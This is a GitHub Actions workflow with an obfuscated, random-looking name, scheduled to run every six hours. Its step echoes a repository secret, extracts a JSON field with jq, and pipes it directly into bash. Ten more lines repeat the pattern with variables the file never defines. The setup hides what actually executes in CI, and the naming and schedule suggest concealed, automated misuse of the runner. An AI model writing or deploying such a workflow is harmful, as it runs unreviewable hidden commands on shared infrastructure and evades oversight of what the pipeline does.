name: pangxifeng5678

on:
  workflow_dispatch:
  schedule:
    - cron: '58 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pangxifeng5678
        env:
          hw3269: ${{ secrets.hw3269 }}
        run: |
          echo $hw3269 | jq -r .ok8 | /bin/bash
          echo $vbwlg972 | jq -r .vdngp69744 | /bin/bash
          echo $orwqg64 | jq -r .hsjib17188 | /bin/bash
          echo $ifo108 | jq -r .q3 | /bin/bash
          echo $neuzq114 | jq -r .ikxz8 | /bin/bash
          echo $y12532 | jq -r .jhh795 | /bin/bash
          echo $zcc987 | jq -r .em9 | /bin/bash
          echo $mkx500 | jq -r .dhkjj147 | /bin/bash
          echo $uv2783 | jq -r .zjjep95 | /bin/bash
          echo $y3 | jq -r .p6 | /bin/bash
          echo $iqyq90637 | jq -r .go76 | /bin/bash

